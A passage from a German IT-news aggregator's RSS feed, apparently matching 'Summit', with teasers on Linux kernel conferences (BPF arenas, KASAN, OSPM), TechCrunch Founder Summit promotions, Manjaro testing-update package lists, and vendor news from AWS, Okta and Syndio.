<content:encoded><![CDATA[<img width="1260" height="840" src="https://cdn.geekwire.com/wp-content/uploads/2019/10/0835-Summit-20191009-DD-1260x840.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2019/10/0835-Summit-20191009-DD-1260x840.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2019/10/0835-Summit-20191009-DD-768x512.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2019/10/0835-Summit-20191009-DD-630x420.jpg 630w, https://cdn.geekwire.com/wp-content/uploads/2019/10/0835-Summit-20191009-DD.jpg 2048w" sizes="(max-width: 1260px) 100vw, 1260px"><br>Syndio announced Tuesday that it acquired Embrace.ai, an agentic AI startup whose founders and technology will help Syndio build out its AI-powered compensation platform. <a href="https://www.geekwire.com/2026/syndio-bets-on-agentic-ai-with-first-acquisition-in-seattle-pay-equity-startups-history/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] A helper library for BPF arenas]]></title>
<description><![CDATA[BPF arenas are areas of memory (potentially shared with user space)
where programs have free reign to build their
own data structures, unburdened by the verifier's bounds checks. Many of those
data structures are potentially usable in multiple programs. Emil Tsalapatis
brought his work on libaren...]]></description>
<link>https://tsecurity.de/de/3622202/linux-tipps/a-helper-library-for-bpf-arenas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622202/linux-tipps/a-helper-library-for-bpf-arenas/</guid>
<pubDate>Wed, 24 Jun 2026 18:55:20 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
<a href="https://lwn.net/Articles/961941/">
BPF arenas</a> are areas of memory (potentially shared with user space)
where programs have free reign to build their
own data structures, unburdened by the verifier's bounds checks. Many of those
data structures are potentially usable in multiple programs. Emil Tsalapatis
brought his work on libarena, a library containing generic utilities for use in
BPF arenas, to the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux Storage, Filesystem, Memory-Management, and BPF
Summit</a>. Although the library is already available as part of the kernel, it
is still in its early stages and he has more work planned.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Reports from OSPM 2026, day two]]></title>
<description><![CDATA[The Power Management
and Scheduling in the Linux Kernel Summit, which still goes by the
historical acronym OSPM, was held in Cambridge, UK, in mid-April.  As has
become traditional, the presenters at that event have since written
summaries of their sessions, and this work has kindly been made ava...]]></description>
<link>https://tsecurity.de/de/3621688/linux-tipps/reports-from-ospm-2026-day-two/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621688/linux-tipps/reports-from-ospm-2026-day-two/</guid>
<pubDate>Wed, 24 Jun 2026 16:24:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The <a href="https://retis.santannapisa.it/ospm-summit/">Power Management
and Scheduling in the Linux Kernel Summit</a>, which still goes by the
historical acronym OSPM, was held in Cambridge, UK, in mid-April.  As has
become traditional, the presenters at that event have since written
summaries of their sessions, and this work has kindly been made available
to LWN for publication.  The second day's sessions covered a wide range of
topics, including device frequency scaling, using time-slice duration for
CPU selection, scheduling domains on multi-cluster Arm systems, the LAVD
scheduler, and more.]]></content:encoded>
</item>
<item>
<title><![CDATA[3 days left to save up to $190 on your TechCrunch Founder Summit 2026 pass]]></title>
<description><![CDATA[You have just 3 days left to save up to $190 on your pass to TechCrunch Founder Summit 2026 before Early Bird rates end on June 26 at 11:59 p.m. PT. Register here.]]></description>
<link>https://tsecurity.de/de/3621587/it-nachrichten/3-days-left-to-save-up-to-190-on-your-techcrunch-founder-summit-2026-pass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621587/it-nachrichten/3-days-left-to-save-up-to-190-on-your-techcrunch-founder-summit-2026-pass/</guid>
<pubDate>Wed, 24 Jun 2026 16:03:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[You have just 3 days left to save up to $190 on your pass to TechCrunch Founder Summit 2026 before Early Bird rates end on June 26 at 11:59 p.m. PT. Register here.]]></content:encoded>
</item>
<item>
<title><![CDATA[Größte IT-Messe des Landes startet in Lübeck | ndr.de]]></title>
<description><![CDATA[Beim "IT4B Digital Summit" stehen Digitalisierung, Künstliche Intelligenz und Cybersicherheit im Mittelpunkt. Bei der IT-Messe "IT4B Digital ...]]></description>
<link>https://tsecurity.de/de/3620829/it-security-nachrichten/groesste-it-messe-des-landes-startet-in-luebeck-ndrde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620829/it-security-nachrichten/groesste-it-messe-des-landes-startet-in-luebeck-ndrde/</guid>
<pubDate>Wed, 24 Jun 2026 11:38:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Beim "IT4B Digital Summit" stehen Digitalisierung, Künstliche Intelligenz und <b>Cybersicherheit</b> im Mittelpunkt. Bei der IT-Messe "IT4B Digital ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Doppelte Auszeichnung für Controlware beim LANCOM Partner Summit 2026]]></title>
<description><![CDATA[Information Security · Data Center & Cloud · Collaboration · Collaboration as ... IT. Die Partnerschaft zwischen LANCOM und Controlware hat sich ...]]></description>
<link>https://tsecurity.de/de/3620094/it-security-nachrichten/doppelte-auszeichnung-fuer-controlware-beim-lancom-partner-summit-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620094/it-security-nachrichten/doppelte-auszeichnung-fuer-controlware-beim-lancom-partner-summit-2026/</guid>
<pubDate>Wed, 24 Jun 2026 04:52:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Information <b>Security</b> · <b>Data</b> Center &amp; Cloud · Collaboration · Collaboration as ... <b>IT</b>. Die Partnerschaft zwischen LANCOM und Controlware hat sich ...]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] KASAN for JIT-compiled BPF code]]></title>
<description><![CDATA[Alexis Lothoré has been working to add support for the kernel's memory-access
checker,

KASAN, to just-in-time-compiled BPF code. He spoke about that work at
the 2026

Linux Storage, Filesystem, Memory-Management, and BPF Summit.
KASAN support is needed, he said, to help catch bugs in the BPF jus...]]></description>
<link>https://tsecurity.de/de/3618833/linux-tipps/kasan-for-jit-compiled-bpf-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618833/linux-tipps/kasan-for-jit-compiled-bpf-code/</guid>
<pubDate>Tue, 23 Jun 2026 17:54:18 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
Alexis Lothoré has been working to add support for the kernel's memory-access
checker,
<a href="https://docs.kernel.org/dev-tools/kasan.html">
KASAN</a>, to just-in-time-compiled BPF code. He spoke about that work at
the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux Storage, Filesystem, Memory-Management, and BPF Summit</a>.
KASAN support is needed, he said, to help catch bugs in the BPF just-in-time (JIT)
compiler. KASAN is a great tool for catching memory-management problems in the
kernel, but only in code that can be monitored by it.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[4 days left to save up to $190 on TechCrunch Founder Summit 2026]]></title>
<description><![CDATA[Four days left to save up to $190 on your pass to TechCrunch Founder Summit 2026 - the ultimate founder bootcamp - before Early Bird rates end on June 26 at 11:59 p.m. PT. Register here.]]></description>
<link>https://tsecurity.de/de/3618533/it-nachrichten/4-days-left-to-save-up-to-190-on-techcrunch-founder-summit-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618533/it-nachrichten/4-days-left-to-save-up-to-190-on-techcrunch-founder-summit-2026/</guid>
<pubDate>Tue, 23 Jun 2026 16:02:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Four days left to save up to $190 on your pass to TechCrunch Founder Summit 2026 - the ultimate founder bootcamp - before Early Bird rates end on June 26 at 11:59 p.m. PT. Register here.]]></content:encoded>
</item>
<item>
<title><![CDATA[This Cryptocurrency Bounty Game Is a Little Too 'Black Mirror']]></title>
<description><![CDATA[Challenges like online betting from the summit of Mount Everest, and much worse, exist on this website.]]></description>
<link>https://tsecurity.de/de/3618170/it-nachrichten/this-cryptocurrency-bounty-game-is-a-little-too-black-mirror/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618170/it-nachrichten/this-cryptocurrency-bounty-game-is-a-little-too-black-mirror/</guid>
<pubDate>Tue, 23 Jun 2026 14:03:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Challenges like online betting from the summit of Mount Everest, and much worse, exist on this website.]]></content:encoded>
</item>
<item>
<title><![CDATA[Roundtable: UK tech chiefs on agentic AI, workforce culture and tokenomics]]></title>
<description><![CDATA[Tech leaders from THG Ingenuity, Kingfisher, Rightmove and Deloitte speak at the Google Summit London about the transition to agentic systems and the rising focus on token costs]]></description>
<link>https://tsecurity.de/de/3618156/it-nachrichten/roundtable-uk-tech-chiefs-on-agentic-ai-workforce-culture-and-tokenomics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618156/it-nachrichten/roundtable-uk-tech-chiefs-on-agentic-ai-workforce-culture-and-tokenomics/</guid>
<pubDate>Tue, 23 Jun 2026 13:47:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tech leaders from THG Ingenuity, Kingfisher, Rightmove and Deloitte speak at the Google Summit London about the transition to agentic systems and the rising focus on token costs]]></content:encoded>
</item>
<item>
<title><![CDATA[TechRiders Summit 2026 wächst deutlich]]></title>
<description><![CDATA[Der TechRiders Summit 2026 hat seine Bedeutung als Treffpunkt der deutschen IT- und Digitalbranche weiter ausgebaut. Wie die Veranstalter der Momentum Projects GmbH mitteilen, kamen am 17. und 18. Juni rund 1.900 Besucher auf den Euronova Campus in Hürth. 

Tags: #TechRiders]]></description>
<link>https://tsecurity.de/de/3617955/it-security-nachrichten/techriders-summit-2026-waechst-deutlich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617955/it-security-nachrichten/techriders-summit-2026-waechst-deutlich/</guid>
<pubDate>Tue, 23 Jun 2026 12:37:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2026/06/TechRiders-1920.jpg" class="attachment-full size-full wp-post-image" alt="TechRiders" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2026/06/TechRiders-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2026/06/TechRiders-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2026/06/TechRiders-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2026/06/TechRiders-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2026/06/TechRiders-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="TechRiders Summit 2026 wächst deutlich 3"></p>
    Der TechRiders Summit 2026 hat seine Bedeutung als Treffpunkt der deutschen IT- und Digitalbranche weiter ausgebaut. Wie die Veranstalter der Momentum Projects GmbH mitteilen, kamen am 17. und 18. Juni rund 1.900 Besucher auf den Euronova Campus in Hürth. 

<p>Tags: <a href="https://www.it-daily.net/thema/techriders">#TechRiders</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-06-23 - Kernels, KDE Frameworks, KDE Gear, Xorg-Server]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, Mid of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you...]]></description>
<link>https://tsecurity.de/de/3617719/unix-server/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617719/unix-server/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/</guid>
<pubDate>Tue, 23 Jun 2026 11:16:30 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, Mid of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-862629-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-862629-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-862629-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-862629-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/188480/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/188480/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/188480/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/188480/1">(click for more details)</a>
<h2><a name="p-862629-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-862629-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got updated
<ul>
<li>introducing <strong>linux72</strong> series</li>
</ul>
</li>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v260.1...v260.2">260.2</a></li>
<li><strong>PipeWire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.6">1.6.6</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.0.16">1.0.16</a></li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/271414/">610.43.02</a></li>
<li><strong>VLC</strong> <a href="https://images.videolan.org/vlc/releases/3.0.23.html">3.0.23_2</a></li>
<li><strong>Arkdep</strong> <a href="https://github.com/arkanelinux/arkdep/compare/2025.12.18...2026.06.10">20260610</a></li>
<li><strong>Xorg-Server</strong> <a href="https://lists.x.org/archives/xorg-announce/2026-June/003702.html">21.1.23</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/26.04.2/">26.04.2</a></li>
<li><strong>KDE Frameworks</strong> <a href="https://kde.org/announcements/frameworks/6/6.27.0/">6.27.0</a></li>
<li><strong>LibreOffice</strong> <a href="https://blog.documentfoundation.org/blog/2026/06/05/tdf-releases-libreoffice-26-2-4/">26.2.4</a></li>
<li><strong>QEmu</strong> <a href="https://www.qemu.org/2026/04/22/qemu-11-0-0/">11.0.1</a></li>
</ul>
<h2><a name="p-862629-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-862629-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/188480/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/188480/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.176</li>
<li>linux66 6.6.143</li>
<li>linux612 6.12.94</li>
<li>linux618 6.18.36</li>
<li>linux70 7.0.13</li>
<li>linux71 7.1.1</li>
<li>linux72 7.2.0-rc0</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (Tue Jun 16 2026 12:41:23 GMT+0000)</p>
<ul>
<li>testing core x86_64:  28 new and 28 removed package(s)</li>
<li>testing extra x86_64:  3515 new and 3453 removed package(s)</li>
<li>testing multilib x86_64:  40 new and 40 removed package(s)</li>
</ul>
<p><strong>Overlay Changes</strong></p>
<ul>
<li>testing core x86_64:  16 new and 14 removed package(s)</li>
<li>testing extra x86_64:  170 new and 165 removed package(s)</li>
<li>testing multilib x86_64:  3 new and 3 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1204/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/188480/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-06-23-kernels-kde-frameworks-kde-gear-xorg-server/188480">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-05-29 - Systemd, COSMIC, NVIDIA, Firefox, Pipewire, VLC]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, beginning of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issu...]]></description>
<link>https://tsecurity.de/de/3616080/unix-server/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616080/unix-server/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/</guid>
<pubDate>Mon, 22 Jun 2026 18:16:47 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, beginning of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-858952-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-858952-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-858952-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-858952-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/188000/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/188000/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/188000/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/188000/1">(click for more details)</a>
<h2><a name="p-858952-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-858952-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v260.1...v260.2">260.2</a></li>
<li><strong>PipeWire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.6">1.6.6</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.0.14">1.0.14</a></li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/271414/">610.43.02</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/firefox/151.0.2/releasenotes/">151.0.2</a></li>
<li><strong>VLC</strong> <a href="https://images.videolan.org/vlc/releases/3.0.23.html">3.0.23_2</a></li>
</ul>
<h2><a name="p-858952-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-858952-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/188000/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/188000/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.174</li>
<li>linux66 6.6.141</li>
<li>linux612 6.12.91</li>
<li>linux618 6.18.33</li>
<li>linux70 7.0.10</li>
<li>linux71 7.1.0-rc5</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (5/29/26 00:30 CEST)</p>
<ul>
<li>testing core x86_64:  7 new and 7 removed package(s)</li>
<li>testing extra x86_64:  645 new and 740 removed package(s)</li>
<li>testing multilib x86_64:  8 new and 8 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://pastebin.com/raw/SFTs3KdH">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/188000/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>20 posts - 13 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-05-29-systemd-cosmic-nvidia-firefox-pipewire-vlc/188000">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Launches Continuum AI Vulnerability Management]]></title>
<description><![CDATA[Amazon Web Services introduced AWS Continuum on June 17 at AWS Summit New York, offering security teams a comprehensive platform for managing code vulnerabilities throughout their entire lifecycle. This article has been indexed from CyberMaterial Read the original article: AWS…
Read more →
The po...]]></description>
<link>https://tsecurity.de/de/3615826/it-security-nachrichten/aws-launches-continuum-ai-vulnerability-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615826/it-security-nachrichten/aws-launches-continuum-ai-vulnerability-management/</guid>
<pubDate>Mon, 22 Jun 2026 16:54:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Amazon Web Services introduced AWS Continuum on June 17 at AWS Summit New York, offering security teams a comprehensive platform for managing code vulnerabilities throughout their entire lifecycle. This article has been indexed from CyberMaterial Read the original article: AWS…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/aws-launches-continuum-ai-vulnerability-management/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/aws-launches-continuum-ai-vulnerability-management/">AWS Launches Continuum AI Vulnerability Management</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The founder conference built for growth: TechCrunch Founder Summit pass rates increase June 26]]></title>
<description><![CDATA[Save up to $190 on your pass to TechCrunch Founder Summit 2026 by June 26, 11:59 p.m. PT. Designed for founders first on November 4 in Boston. Register here.]]></description>
<link>https://tsecurity.de/de/3615690/it-nachrichten/the-founder-conference-built-for-growth-techcrunch-founder-summit-pass-rates-increase-june-26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615690/it-nachrichten/the-founder-conference-built-for-growth-techcrunch-founder-summit-pass-rates-increase-june-26/</guid>
<pubDate>Mon, 22 Jun 2026 16:03:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Save up to $190 on your pass to TechCrunch Founder Summit 2026 by June 26, 11:59 p.m. PT. Designed for founders first on November 4 in Boston. Register here.]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Reports from OSPM 2026, day one]]></title>
<description><![CDATA[The Power Management
and Scheduling in the Linux Kernel Summit, which still goes by the
historical acronym OSPM, was held in Cambridge, UK, in mid-April.  As has
become traditional, the presenters at that event have since written
summaries of their sessions, and this work has kindly been made ava...]]></description>
<link>https://tsecurity.de/de/3615679/linux-tipps/reports-from-ospm-2026-day-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615679/linux-tipps/reports-from-ospm-2026-day-one/</guid>
<pubDate>Mon, 22 Jun 2026 15:56:40 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The <a href="https://retis.santannapisa.it/ospm-summit/">Power Management
and Scheduling in the Linux Kernel Summit</a>, which still goes by the
historical acronym OSPM, was held in Cambridge, UK, in mid-April.  As has
become traditional, the presenters at that event have since written
summaries of their sessions, and this work has kindly been made available
to LWN for publication.  The first day's sessions covered a wide range of
topics, including idle-state selection, user-space schedulers with
sched_ext, lock-holder preemption, and much more.]]></content:encoded>
</item>
<item>
<title><![CDATA[Okta AI Identity Summit 2026: Das bedeutet „Okta secure AI“]]></title>
<description><![CDATA[„Okta secures AI“. Unter diesem Motto fand letzte Woche die hiesige Ausgabe des Okta AI Identity Summit in Frankfurt am Main statt. Dort wollte ich vom SVP & GM AI Security, Harish Peri, unter anderem wissen, was es mit diesem Claim genau auf sich hat. Und wo Harish Okta heute in einem Jahr sieht...]]></description>
<link>https://tsecurity.de/de/3615508/it-nachrichten/okta-ai-identity-summit-2026-das-bedeutet-okta-secure-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615508/it-nachrichten/okta-ai-identity-summit-2026-das-bedeutet-okta-secure-ai/</guid>
<pubDate>Mon, 22 Jun 2026 15:03:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
